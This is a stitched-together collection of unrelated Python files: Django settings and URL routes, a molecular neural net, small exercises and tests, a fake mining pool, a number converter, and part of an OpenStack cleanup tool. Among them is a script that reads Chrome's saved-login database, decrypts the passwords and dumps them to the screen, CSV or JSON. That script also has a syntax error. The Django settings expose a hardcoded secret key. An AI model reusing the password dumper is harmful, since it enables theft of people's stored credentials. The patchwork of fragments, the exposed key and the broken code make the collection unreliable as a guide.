SECRET_KEY = '8cfd0kv_khr)*8agw0heyh$45u)st54emhy8+49qcqc9&%ib3u'
ALLOWED_HOSTS = []
INSTALLED_APPS = [
'impulse.alert',
'impulse.event',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_twilio',
'phonenumber_field',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'impulse.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'impulse.wsgi.application'
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
PHONENUMBER_DB_FORMAT = 'E164'
PHONENUMBER_DEFAULT_REGION = 'E164'
|
import autograd.numpy as np
from util import memoize, WeightsParser
from rdkit_utils import smiles_to_fps
def batch_normalize(activations):
mbmean = np.mean(activations, axis=0, keepdims=True)
return (activations - mbmean) / (np.std(activations, axis=0, keepdims=True) + 1)
def relu(X):
"Rectified linear activation function."
return X * (X > 0)
def sigmoid(x):
return 0.5*(np.tanh(x) + 1)
def mean_squared_error(predictions, targets):
return np.mean((predictions - targets)**2, axis=0)
def categorical_nll(predictions, targets):
return -np.mean(predictions * targets)
def binary_classification_nll(predictions, targets):
"""Predictions is a real number, whose sigmoid is the probability that
the target is 1."""
pred_probs = sigmoid(predictions)
label_probabilities = pred_probs * targets + (1 - pred_probs) * (1 - targets)
return -np.mean(np.log(label_probabilities))
def build_standard_net(layer_sizes, normalize, L2_reg, L1_reg=0.0, activation_function=relu,
nll_func=mean_squared_error):
"""Just a plain old neural net, nothing to do with molecules.
layer sizes includes the input size."""
layer_sizes = layer_sizes + [1]
parser = WeightsParser()
for i, shape in enumerate(zip(layer_sizes[:-1], layer_sizes[1:])):
parser.add_weights(('weights', i), shape)
parser.add_weights(('biases', i), (1, shape[1]))
def predictions(W_vect, X):
cur_units = X
for layer in range(len(layer_sizes) - 1):
cur_W = parser.get(W_vect, ('weights', layer))
cur_B = parser.get(W_vect, ('biases', layer))
cur_units = np.dot(cur_units, cur_W) + cur_B
if layer < len(layer_sizes) - 2:
if normalize:
cur_units = batch_normalize(cur_units)
cur_units = activation_function(cur_units)
return cur_units[:, 0]
def loss(w, X, targets):
assert len(w) > 0
log_prior = -L2_reg * np.dot(w, w) / len(w) - L1_reg * np.mean(np.abs(w))
preds = predictions(w, X)
return nll_func(preds, targets) - log_prior
return loss, predictions, parser
def build_fingerprint_deep_net(net_params, fingerprint_func, fp_parser, fp_l2_penalty):
"""Composes a fingerprint function with signature (smiles, weights, params)
with a fully-connected neural network."""
net_loss_fun, net_pred_fun, net_parser = build_standard_net(**net_params)
combined_parser = WeightsParser()
combined_parser.add_weights('fingerprint weights', (len(fp_parser),))
combined_parser.add_weights('net weights', (len(net_parser),))
def unpack_weights(weights):
fingerprint_weights = combined_parser.get(weights, 'fingerprint weights')
net_weights = combined_parser.get(weights, 'net weights')
return fingerprint_weights, net_weights
def loss_fun(weights, smiles, targets):
fingerprint_weights, net_weights = unpack_weights(weights)
fingerprints = fingerprint_func(fingerprint_weights, smiles)
net_loss = net_loss_fun(net_weights, fingerprints, targets)
if len(fingerprint_weights) > 0 and fp_l2_penalty > 0:
return net_loss + fp_l2_penalty * np.mean(fingerprint_weights**2)
else:
return net_loss
def pred_fun(weights, smiles):
fingerprint_weights, net_weights = unpack_weights(weights)
fingerprints = fingerprint_func(fingerprint_weights, smiles)
return net_pred_fun(net_weights, fingerprints)
return loss_fun, pred_fun, combined_parser
def build_morgan_fingerprint_fun(fp_length=512, fp_radius=4):
def fingerprints_from_smiles(weights, smiles):
# Morgan fingerprints don't use weights.
return fingerprints_from_smiles_tuple(tuple(smiles))
@memoize # This wrapper function exists because tuples can be hashed, but arrays can't.
def fingerprints_from_smiles_tuple(smiles_tuple):
return smiles_to_fps(smiles_tuple, fp_length, fp_radius)
return fingerprints_from_smiles
def build_morgan_deep_net(fp_length, fp_depth, net_params):
empty_parser = WeightsParser()
morgan_fp_func = build_morgan_fingerprint_fun(fp_length, fp_depth)
return build_fingerprint_deep_net(net_params, morgan_fp_func, empty_parser, 0)
def build_mean_predictor(loss_func):
parser = WeightsParser()
parser.add_weights('mean', (1,))
def loss_fun(weights, smiles, targets):
mean = parser.get(weights, 'mean')
return loss_func(np.full(targets.shape, mean), targets)
def pred_fun(weights, smiles):
mean = parser.get(weights, 'mean')
return np.full((len(smiles),), mean)
return loss_fun, pred_fun, parser
|
class person():
hp = 3
atk = 1
class goblin():
hp = 2
atk = 1
class dragon():
hp = 10
atk = 3
|
"""melodi URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.contrib.auth.views import logout, login
from django.views.generic import TemplateView
from django.contrib.auth import views as auth_views
from django.core.urlresolvers import reverse_lazy
from browser.views import *
from rest_framework import routers
router = routers.DefaultRouter()
router.register(r'searchset', SearchSetViewSet, base_name="SearchSet")
urlpatterns = [
url(r'^api/', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
#url(r'^browser/', include('browser.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'', include('social_auth.urls')),
url(r'^about', about, name='about'),
url(r'^citation', citation, name='citation'),
url(r'^help', help, name='help'),
url(r'^contact', contact, name='contact'),
url(r'^logout/', logout, {'next_page': reverse_lazy('home')}, name='logout'),
url(r'^login/', login, name='login'),
#url(r'^login-error/$', TemplateView.as_view(template_name="login-error.html")),
url(r'^$', index, name='home'),
url(r'^jobs/', jobs, name='jobs'),
url(r'^results/(?P<num>[0-9a-z-]+)/$', results, name='results'),
url(r'^complete/(?P<backend>[^/]+)/$', AuthComplete.as_view()),
url(r'^login-error/$', LoginError.as_view()),
url(r'^database/$', OrderListJson.as_view(), name='order_list_json'),
url(r'^pubs/(?P<num>[0-9]+_[0-9])/$',pubDetails, name='pubs'),
url(r'^pubss/(?P<num>.*_[0-9]+_[0-9])/$',pubSingle, name='pubss'),
url(r'^ajax_searchset/$', ajax_searchset.as_view(), name='ajax_searchset'),
url(r'^ajax_compare/$', ajax_compare.as_view(), name='ajax_compare'),
url(r'^get_semmed_items/',get_semmed_items, name='get_semmed_items'),
url(r'^articles/(?P<num>[0-9]+)/$',articleDetails, name='articles'),
url(r'^ajax_overlap/$', ajax_overlap.as_view(), name='ajax_overlap'),
url(r'^dt_test_page/$', dt_test_page, name='dt_test_page'),
url(r'^ajax_graph_metrics/$', ajax_graph_metrics, name='ajax_graph_metrics'),
url(r'^ajax_share/$', ajax_share, name='ajax_share'),
url(r'^ajax_delete/$', ajax_delete, name='ajax_delete'),
url(r'^download_result/$', download_result, name='download_result'),
url(r'^download_filter/$', download_filter, name='download_filter'),
url(r'^upload_filter/$', upload_filter, name='upload_filter'),
url(r'^save_filter/$', save_filter, name='save_filter'),
url(r'^temmpo/$', temmpo, name='temmpo'),
url(r'^temmpo_res/$', temmpo_res, name='temmpo_res')
]
|
from src.CommentReflow import GreatestCommonPrefix
class TestBasic:
gcp = GreatestCommonPrefix()
def test_pine_match(self):
actual = self.gcp.parse(['pineapple',
'pine tree'])
assert 'pine' == actual
def test_pine_miss(self):
actual = self.gcp.parse([' pineapple',
'pine tree'])
assert '' == actual
def test_indented_match(self):
actual = self.gcp.parse([' chicken',
' chickpea'])
assert ' chick' == actual
def test_same_match(self):
actual = self.gcp.parse(['dog',
'dog'])
assert 'dog' == actual
def test_whole_word_match(self):
actual = self.gcp.parse(['stack',
'stacked'])
assert 'stack' == actual
def test_whole_word_match_reordered(self):
actual = self.gcp.parse(['stacked',
'stack'])
assert 'stack' == actual
def test_empty_strings(self):
actual = self.gcp.parse(['', ''])
assert '' == actual
def test_single_item(self):
actual = self.gcp.parse(['single'])
assert 'single' == actual
def test_many_match(self):
actual = self.gcp.parse(['single',
'singleton',
'singing',
'singed',
'sine'])
assert 'sin' == actual
class TestWhiteSpaceWhiteList:
gcp = GreatestCommonPrefix(whitelist=' \t\r\n')
def test_spaces(self):
actual = self.gcp.parse([' pineapple',
' pine tree'])
assert ' ' == actual
def test_four_spaces_tab_no_match(self):
actual = self.gcp.parse([' pineapple',
'\tpine tree'])
assert '' == actual
def test_eight_spaces_tab_no_match(self):
actual = self.gcp.parse([' pineapple',
'\tpine tree'])
assert '' == actual
def test_different_line_endings_no_match(self):
actual = self.gcp.parse(['\r\n',
'\n'])
assert '' == actual
def test_alternating_allowed(self):
actual = self.gcp.parse(['\tW\tW',
'\tW\tW'])
assert '\t' == actual
def test_same_word_blacklisted(self):
actual = self.gcp.parse(['test',
'test'])
assert '' == actual
class TestWhiteList:
gcp = GreatestCommonPrefix(whitelist='pla')
def test_partial_match(self):
actual = self.gcp.parse(['appliance',
'applicable'])
assert 'appl' == actual
def test_full_match(self):
actual = self.gcp.parse(['pal',
'pal'])
assert 'pal' == actual
def test_no_match(self):
actual = self.gcp.parse(['dog',
'dog'])
assert '' == actual
class TestRegex:
gcp = GreatestCommonPrefix(regex=r"[ \t]*'+[ \t]*")
def test_one_single_quote(self):
actual = self.gcp.parse(["'' test",
"' test"])
assert "'" == actual
def test_space_no_quote(self):
actual = self.gcp.parse([' pineapple',
'pine tree'])
assert '' == actual
def test_spaces_no_quote(self):
actual = self.gcp.parse([' chicken',
' chickpea'])
assert '' == actual
def test_spaces_quote(self):
actual = self.gcp.parse([" 'chicken",
" 'chickpea"])
assert " '" == actual
def test_spaces_quote_tab(self):
actual = self.gcp.parse([" '\tchicken",
" '\tchickpea"])
assert " '\t" == actual
def test_same_word_no_match(self):
actual = self.gcp.parse(["dog",
"dog"])
assert "" == actual
def test_quoted_word_single_quotes(self):
actual = self.gcp.parse(["'stack'",
"'stacked'"])
assert "'" == actual
def test_quoted_word_double_quotes(self):
actual = self.gcp.parse(['"stack"',
'"stacked"'])
assert "" == actual
|
import time
class Timer:
def __init__(self, name, interval = 's'):
if not name.replace(' ', '').isalnum():
raise ValueError('Device names must only contain letters, numbers and spaces')
self.start_time()
self.name = name
if interval == 'ms':
self.interval = .001
if interval == 's':
self.interval = 1
if interval == 'm':
self.interval = 60
def start_time(self):
self.start = time.time()
def read(self):
cur = time.time()
diff = cur - self.start
return diff / self.interval
|
from itertools import count
# if i % 20 == 0:
# if i % 19 == 0:
# if i % 18 == 0:
# if i % 17 == 0:
# if i % 16 == 0:
# if i % 15 == 0:
# if i % 14 == 0:
# if i % 13 == 0:
# if i % 12 == 0:
# if i % 11 == 0:
# if i % 10 == 0:
# if i % 9 == 0:
# if i % 8 == 0:
# if i % 7 == 0:
# if i % 6 == 0:
# if i % 5 == 0:
# if i % 4 == 0:
# if i % 3 == 0:
# if i % 2 == 0:
# num = i
# break
i = 1
for k in (range(1,21)):
if i % k > 0:
for j in range(1, 21):
# if i is not divisible by k, then multiply it by each number until it is divisible
if (i*j) % k == 0:
# set i to that value and go to next value
i *= j
break
print(i)
|
from mathml.termbuilder import tree_converters, InfixTermBuilder
__all__ = [ 'SqlTermBuilder' ]
class SqlTermBuilder(InfixTermBuilder):
_NAME_MAP = {
'e' : 'exp(1.0)',
'pi' : 'pi()',
'true' : 'TRUE',
'false' : 'FALSE'
}
def _handle_const_bool(self, operator, operands, affin):
return [ operands[0] and 'TRUE' or 'FALSE' ]
def _handle_const_complex(self, operator, operands, affin):
raise NotImplementedError("Complex numbers cannot be converted to SQL.")
def _handle_interval(self, operator, operands, affin):
raise NotImplementedError("Intervals cannot be converted to SQL.")
tree_converters.register_converter('sql', SqlTermBuilder())
|
"""
A fake pool that only serves one getwork, meant for local testing
"""
import gevent.pywsgi
import os, logging, json
def handle_getwork():
response = {"id":1,"error":None,"result":{"midstate":"5fa3febd7c47f69762101eb58f7e07f86414f6cddab264ea29e979e93a681af3","target":"ffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000","data":"0000000141eb2ea2dff39b792c3c4112408b930de8fb7e3aef8a75f400000709000000001d716842411d0488da0d1ccd34e8f3e7d5f0682632efec00b80c7e3f84e175854fb7bead1a09ae0200000000000000800000000000000000000000000000000000000000000000000000000000000000000000000000000080020000","hash1":"00000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000010000"}}
return json.dumps(response)
def handle_submit():
response = {'result':True, 'id':1, 'error':None}
return json.dumps(response)
def read_input(env):
inp = env['wsgi.input']
r = ""
while True:
a = inp.read()
if a == None or len(a) == 0:
break
r += a
return r
def initialize():
log = open(os.devnull, 'wb')
server = gevent.pywsgi.WSGIServer(('127.0.0.1', 8338), serve, log=log)
gevent.spawn(server.serve_forever)
def serve(env, start_response):
start_response('200 OK', [])
body = read_input(env)
body = json.loads(body)
if body['params'] != []:
return handle_submit()
return handle_getwork()
|
from .binary import BinaryCommand, BinaryDevice, BinaryReply, BinarySerial
from .exceptions import TimeoutError, UnexpectedReplyError
|
import os
import sys
import sqlite3
import csv
import json
import argparse
try:
import win32crypt
except:
pass
def args_parser():
parser = argparse.ArgumentParser(
description="Retrieve Google Chrome Passwords")
parser.add_argument("-o", "--output", choices=['csv', 'json'],
help="Output passwords to [ CSV | JSON ] format.")
parser.add_argument(
"-d", "--dump", help="Dump passwords to stdout. ", action="store_true")
args = parser.parse_args()
if args.dump:
for data in main():
print(data)
if args.output == 'csv':
output_csv(main())
return
if args.output == 'json':
output_json(main())
return
else:
parser.print_help()
def main():
info_list = []
path = getpath()
try:
connection = sqlite3.connect(path + "Login Data")
with connection:
cursor = connection.cursor()
v = cursor.execute(
'SELECT action_url, username_value, password_value FROM logins')
value = v.fetchall()
if (os.name == "posix") and (sys.platform == "darwin"):
print("Mac OSX not supported.")
sys.exit(0)
for origin_url, username, password in value:
if os.name == 'nt':
password = win32crypt.CryptUnprotectData(
password, None, None, None, 0)[1]
if password:
info_list.append({
'origin_url': origin_url,
'username': username,
'password': str(password)
})
except sqlite3.OperationalError as e:
e = str(e)
if (e == 'database is locked'):
print('[!] Make sure Google Chrome is not running in the background')
elif (e == 'no such table: logins'):
print('[!] Something wrong with the database name')
elif (e == 'unable to open database file'):
print('[!] Something wrong with the database path')
else:
print(e)
sys.exit(0)
return info_list
def getpath():
if os.name == "nt":
# This is the Windows Path
PathName = os.getenv('localappdata') + \
'\\Google\\Chrome\\User Data\\Default\\'
elif os.name == "posix":
PathName = os.getenv('HOME')
if sys.platform == "darwin"
# This is the OS X Path
PathName += '/Library/Application Support/Google/Chrome/Default/'
else:
# This is the Linux Path
PathName += '/.config/google-chrome/Default/'
if not os.path.isdir(PathName):
print('[!] Chrome Doesn\'t exists')
sys.exit(0)
return PathName
def output_csv(info):
try:
with open('chromepass-passwords.csv', 'wb') as csv_file:
csv_file.write('origin_url,username,password \n'.encode('utf-8'))
for data in info:
csv_file.write(('%s, %s, %s \n' % (data['origin_url'], data[
'username'], data['password'])).encode('utf-8'))
print("Data written to chromepass-passwords.csv")
except EnvironmentError:
print('EnvironmentError: cannot write data')
def output_json(info):
try:
with open('chromepass-passwords.json', 'w') as json_file:
json.dump({'password_items':info},json_file)
print("Data written to chromepass-passwords.json")
except EnvironmentError:
print('EnvironmentError: cannot write data')
if __name__ == '__main__':
args_parser()
|
import argparse
import string
def dec_to_bin(dec, verbose=False):
rest = dec % 2
if int(dec) != 0:
if verbose == True:
print "%s \t:\t 2 = %s \t-- Rest: %s" % (dec,int(dec/2),rest)
verbose = True
binary = str(dec_to_bin(int(dec/2),verbose)) + str(rest)
return binary
else:
return ""
def dec_to_hex(dec, verbose=False):
substitution = {
"10" : "A",
"11" : "B",
"12" : "C",
"13" : "D",
"14" : "E",
"15" : "F"
}
rest = str(dec % 16)
if rest in substitution:
rest = rest.replace(rest,substitution[rest])
if int(dec) != 0:
if verbose == True:
print "%s \t:\t 16 = %s \t-- Rest: %s" % (dec,int(dec/16),rest)
verbose = True
hexa = str(dec_to_hex(int(dec/16),verbose)) + str(rest)
return hexa
else:
return ""
def bin_to_dec(binary):
decimal = 0
reversed_binary = str(binary)[::-1]
for digit in range(len(reversed_binary)):
decimal = decimal + int(str(reversed_binary)[digit]) * (2 ** digit)
return decimal
def hex_to_dec(hexa):
substitution = {
"a" : "10",
"b" : "11",
"c" : "12",
"d" : "13",
"e" : "14",
"f" : "15"
}
"""
For further version, following code would inverse a decitionary, even when the values
are not unique:
inv_substitution = {}
for k, v in substitution.iteritems():
inv_substitution[v] = inv_substitution.get(v, [])
inv_substitution[v].append(k)
(found here: http://stackoverflow.com/questions/483666/python-reverse-inverse-a-mapping)
"""
decimal = 0
rev_hex = str(hexa)[::-1].lower()
for digit in range(len(rev_hex)):
if rev_hex[digit] in substitution:
new_hex = rev_hex[digit].replace(rev_hex[digit],substitution[rev_hex[digit]])
else:
new_hex = rev_hex[digit]
decimal = decimal + int(new_hex) * (16 ** digit)
return decimal
def hex_to_bin(hexa, verbose=False):
return dec_to_bin(hex_to_dec(hexa), verbose)
def bin_to_hex(bin, verbose=False):
return dec_to_hex(bin_to_dec(bin), verbose)
def is_binary(s):
for digit in str(s):
if digit != "0" and digit != "1":
result = False
break
else:
result = True
return result
def main():
parser = argparse.ArgumentParser(description='Covert hexadecimal, decimal and binary numbers. Use only one argument at a time.')
parser.add_argument('-H', '--hex', type=str, help='hexadecimal number to convert', required=False, default=None)
parser.add_argument('-b', '--binary', type=str, help='binary number to convert', required=False, default=None)
parser.add_argument('-d', '--decimal', type=int, help='positive decimal number to convert', required=False, default=None)
parser.add_argument('-v', '--verbose', action='store_true', required=False, default=False)
args = parser.parse_args()
if args.hex and not args.binary and not args.decimal:
if all(c in string.hexdigits for c in args.hex) == True:
print "%s(hex) = %s(dec)\n" % (args.hex, hex_to_dec(args.hex))
print "%s(hex) = %s(bin)\n" % (args.hex,hex_to_bin(args.hex, args.verbose))
else:
print "%s is not a hexadecimal." % args.hex
elif args.binary and not args.hex and not args.decimal:
if is_binary(args.binary) == True:
print "%s(bin) = %s(dec)\n" % (args.binary, bin_to_dec(args.binary))
print "%s(bin) = %s(hex)\n" % (args.binary,bin_to_hex(args.binary,args.verbose))
else:
print "%s is not a binary number." % args.binary
elif args.decimal and not args.hex and not args.binary:
if args.decimal >= 0:
print "%s(dec) = %s(hex)\n" % (args.decimal,dec_to_hex(args.decimal,args.verbose))
print "%s(dec) = %s(bin)\n" % (args.decimal,dec_to_bin(args.decimal,args.verbose))
else:
print "%s is not a postive decimal number" % args.decimal
else:
parser.print_help()
if __name__ == "__main__":
main()
|
import argparse
import logging
import os
import sys
import time
import ceilometerclient.exc
from ceilometerclient.v2 import client as ceilometer_client
import cinderclient.exceptions
from cinderclient.v1 import client as cinder_client
import glanceclient.exc
from glanceclient.v1 import client as glance_client
from heatclient import client as heat_client
import heatclient.openstack.common.apiclient.exceptions
from keystoneclient.apiclient import exceptions as api_exceptions
import keystoneclient.openstack.common.apiclient.exceptions
from keystoneclient.v2_0 import client as keystone_client
import neutronclient.common.exceptions
from neutronclient.v2_0 import client as neutron_client
import novaclient.exceptions
from novaclient.v1_1 import client as nova_client
import requests
from swiftclient import client as swift_client
RETRIES = 10 # Retry a delete operation 10 times before exiting
TIMEOUT = 5 # 5 seconds timeout between retries
class ResourceNotEnabled(Exception):
pass
class EndpointNotFound(Exception):
pass
class InvalidEndpoint(Exception):
pass
class NoSuchProject(Exception):
ERROR_CODE = 2
AUTHENTICATION_FAILED_ERROR_CODE = 3
class DeletionFailed(Exception):
ERROR_CODE = 4
CONNECTION_ERROR_CODE = 5
NOT_AUTHORIZED = 6
RESOURCES_CLASSES = ['CinderSnapshots',
'CinderBackups',
'NovaServers',
'NeutronFloatingIps',
'NeutronFireWall',
'NeutronFireWallPolicy',
'NeutronFireWallRule',
'NeutronLbMembers',
'NeutronLbVip',
'NeutronLbHealthMonitor',
'NeutronLbPool',
'NeutronMeteringLabel',
'NeutronInterfaces',
'NeutronRouters',
'NeutronPorts',
'NeutronNetworks',
'NeutronSecgroups',
'GlanceImages',
'SwiftObjects',
'SwiftContainers',
'CinderVolumes',
'CeilometerAlarms',
'HeatStacks']
def retry(service_name):
def factory(func):
"""Decorator allowing to retry in case of failure."""
def wrapper(*args, **kwargs):
n = 0
while True:
try:
return func(*args, **kwargs)
except Exception as e:
if getattr(e, 'http_status', False) == 404:
# Sometimes a resource can be deleted manually by
# someone else while ospurge is running and listed it.
# If this happens, We raise a Warning.
logging.warning(
"Can not delete the resource because it does not"
" exist : %s" % e
)
# No need to retry deleting an non existing resource
break
else:
if n == RETRIES:
raise DeletionFailed(service_name)
n += 1
logging.info("* Deletion failed - "
"Retrying in {} seconds - "
"Retry count {}".format(TIMEOUT, n))
time.sleep(TIMEOUT)
return wrapper
return factory
class Session(object):
"""A Session stores information that can be used by the different Openstack Clients.
The most important data is:
* self.token - The Openstack token to be used accross services;
* self.catalog - Allowing to retrieve services' endpoints.
"""
def __init__(self, username, password, project_id, auth_url,
endpoint_type="publicURL", region_name=None, insecure=False):
client = keystone_client.Client(
username=username, password=password, tenant_id=project_id,
auth_url=auth_url, region_name=region_name, insecure=insecure)
# Storing username, password, project_id and auth_url for
# use by clients libraries that cannot use an existing token.
self.username = username
self.password = password
self.project_id = project_id
self.auth_url = auth_url
self.region_name = region_name
self.insecure = insecure
# Session variables to be used by clients when possible
self.token = client.auth_token
self.user_id = client.user_id
self.project_name = client.project_name
self.endpoint_type = endpoint_type
self.catalog = client.service_catalog.get_endpoints()
def get_endpoint(self, service_type):
try:
return self.catalog[service_type][0][self.endpoint_type]
except (KeyError, IndexError):
# Endpoint could not be found
raise EndpointNotFound(service_type)
class Resources(object):
"""Abstract base class for all resources to be removed."""
def __init__(self, session):
self.session = session
def list(self):
pass
def delete(self, resource):
"""Displays informational message about a resource deletion."""
logging.info("* Deleting {}.".format(self.resource_str(resource)))
def purge(self):
"""Delete all resources."""
# Purging is displayed and done only if self.list succeeds
resources = self.list()
c_name = self.__class__.__name__
logging.info("* Purging {}".format(c_name))
for resource in resources:
retry(c_name)(self.delete)(resource)
def dump(self):
"""Display all available resources."""
# Resources type and resources are displayed only if self.list succeeds
resources = self.list()
c_name = self.__class__.__name__
print("* Resources type: {}".format(c_name))
for resource in resources:
print(self.resource_str(resource))
print("")
class SwiftResources(Resources):
def __init__(self, session):
super(SwiftResources, self).__init__(session)
self.endpoint = self.session.get_endpoint("object-store")
self.token = self.session.token
conn = swift_client.HTTPConnection(self.endpoint, insecure=self.session.insecure)
self.http_conn = conn.parsed_url, conn
# This method is used to retrieve Objects as well as Containers.
def list_containers(self):
containers = swift_client.get_account(self.endpoint, self.token, http_conn=self.http_conn)[1]
return (cont['name'] for cont in containers)
class SwiftObjects(SwiftResources):
def list(self):
swift_objects = []
for cont in self.list_containers():
objs = [{'container': cont, 'name': obj['name']} for obj in
swift_client.get_container(self.endpoint, self.token, cont, http_conn=self.http_conn)[1]]
swift_objects.extend(objs)
return swift_objects
def delete(self, obj):
super(SwiftObjects, self).delete(obj)
swift_client.delete_object(self.endpoint, token=self.token, http_conn=self.http_conn,
container=obj['container'], name=obj['name'])
def resource_str(self, obj):
return "object {} in container {}".format(obj['name'], obj['container'])
class SwiftContainers(SwiftResources):
def list(self):
return self.list_containers()
def delete(self, container):
"""Container must be empty for deletion to succeed."""
super(SwiftContainers, self).delete(container)
swift_client.delete_container(self.endpoint, self.token, container, http_conn=self.http_conn)
def resource_str(self, obj):
return "container {}".format(obj)
class CinderResources(Resources):
def __init__(self, session):
super(CinderResources, self).__init__(session)
# Cinder client library can't use an existing token. When
# using this library, we have to reauthenticate.
self.client = cinder_client.Client(
session.username, session.password,
session.project_name, session.auth_url, session.insecure,
endpoint_type=session.endpoint_type,
region_name=session.region_name)
class CinderSnapshots(CinderResources):
def list(self):
return self.client.volume_snapshots.list()
def delete(self, snap):
super(CinderSnapshots, self).delete(snap)
self.client.volume_snapshots.delete(snap)
def resource_str(self, snap):
return "snapshot {} (id {})".format(snap.display_name, snap.id)
class CinderVolumes(CinderResources):
def list(self):
return self.client.volumes.list()
def delete(self, vol):
"""Snapshots created from the volume must be deleted first."""
super(CinderVolumes, self).delete(vol)
self.client.volumes.delete(vol)
def resource_str(self, vol):
return "volume {} (id {})".format(vol.display_name, vol.id)
class CinderBackups(CinderResources):
def list(self):
return self.client.backups.list()
def delete(self, backup):
super(CinderBackups, self).delete(backup)
self.client.backups.delete(backup)
def resource_str(self, backup):
return "backup {} (id {}) of volume {}".format(backup.name, backup.id, backup.volume_id)
class NeutronResources(Resources):
def __init__(self, session):
super(NeutronResources, self).__init__(session)
self.client = neutron_client.Client(
username=session.username, password=session.password,
tenant_id=session.project_id, auth_url=session.auth_url,
endpoint_type=session.endpoint_type,
region_name=session.region_name, insecure=session.insecure)
self.project_id = session.project_id
# This method is used for routers and interfaces removal
def list_routers(self):
return filter(
self._owned_resource,
self.client.list_routers(tenant_id=self.project_id)['routers'])
def _owned_resource(self, res):
# Only considering resources owned by project
# We try to filter directly in the client.list() commands, but some 3rd
# party Neutron plugins may ignore the "tenant_id=self.project_id"
# keyword filtering parameter. An extra check does not cost much and
# keeps us on the safe side.
return res['tenant_id'] == self.project_id
class NeutronRouters(NeutronResources):
def list(self):
return self.list_routers()
def delete(self, router):
"""Interfaces must be deleted first."""
super(NeutronRouters, self).delete(router)
# Remove router gateway prior to remove the router itself
self.client.remove_gateway_router(router['id'])
self.client.delete_router(router['id'])
@staticmethod
def resource_str(router):
return "router {} (id {})".format(router['name'], router['id'])
class NeutronInterfaces(NeutronResources):
def list(self):
# Only considering "router_interface" ports
# (not gateways, neither unbound ports)
all_ports = [
port for port in self.client.list_ports(
tenant_id=self.project_id)['ports']
if port["device_owner"] == "network:router_interface"
]
return filter(self._owned_resource, all_ports)
def delete(self, interface):
super(NeutronInterfaces, self).delete(interface)
self.client.remove_interface_router(interface['device_id'],
{'port_id': interface['id']})
@staticmethod
def resource_str(interface):
return "interface {} (id {})".format(interface['name'],
interface['id'])
class NeutronPorts(NeutronResources):
# When created, unbound ports' device_owner are "". device_owner
# is of the form" compute:*" if it has been bound to some vm in
# the past.
def list(self):
all_ports = [
port for port in self.client.list_ports(
tenant_id=self.project_id)['ports']
if port["device_owner"] == ""
or port["device_owner"].startswith("compute:")
]
return filter(self._owned_resource, all_ports)
def delete(self, port):
super(NeutronPorts, self).delete(port)
self.client.delete_port(port['id'])
@staticmethod
def resource_str(port):
return "port {} (id {})".format(port['name'], port['id'])
class NeutronNetworks(NeutronResources):
def list(self):
return filter(self._owned_resource,
self.client.list_networks(
tenant_id=self.project_id)['networks'])
def delete(self, net):
"""Delete a Neutron network
Interfaces connected to the network must be deleted first.
Implying there must not be any VM on the network.
"""
super(NeutronNetworks, self).delete(net)
self.client.delete_network(net['id'])
@staticmethod
def resource_str(net):
return "network {} (id {})".format(net['name'], net['id'])
class NeutronSecgroups(NeutronResources):
def list(self):
# filtering out default security group (cannot be removed)
def secgroup_filter(secgroup):
if secgroup['name'] == 'default':
return False
return self._owned_resource(secgroup)
try:
sgs = self.client.list_security_groups(
tenant_id=self.project_id)['security_groups']
return filter(secgroup_filter, sgs)
except neutronclient.common.exceptions.NeutronClientException as err:
if getattr(err, "status_code", None) == 404:
raise ResourceNotEnabled
raise
def delete(self, secgroup):
"""VMs using the security group should be deleted first."""
super(NeutronSecgroups, self).delete(secgroup)
self.client.delete_security_group(secgroup['id'])
@staticmethod
def resource_str(secgroup):
return "security group {} (id {})".format(
secgroup['name'], secgroup['id'])
class NeutronFloatingIps(NeutronResources):
def list(self):
return filter(self._owned_resource,
self.client.list_floatingips(
tenant_id=self.project_id)['floatingips'])
def delete(self, floating_ip):
super(NeutronFloatingIps, self).delete(floating_ip)
self.client.delete_floatingip(floating_ip['id'])
@staticmethod
def resource_str(floating_ip):
return "floating ip {} (id {})".format(
floating_ip['floating_ip_address'], floating_ip['id'])
class NeutronLbMembers(NeutronResources):
def list(self):
return filter(self._owned_resource, self.client.list_members(
tenant_id=self.project_id)['members'])
def delete(self, member):
super(NeutronLbMembers, self).delete(member)
self.client.delete_member(member['id'])
@staticmethod
def resource_str(member):
return "lb-member {} (id {})".format(member['address'], member['id'])
class NeutronLbPool(NeutronResources):
def list(self):
return filter(self._owned_resource, self.client.list_pools(
tenant_id=self.project_id)['pools'])
def delete(self, pool):
super(NeutronLbPool, self).delete(pool)
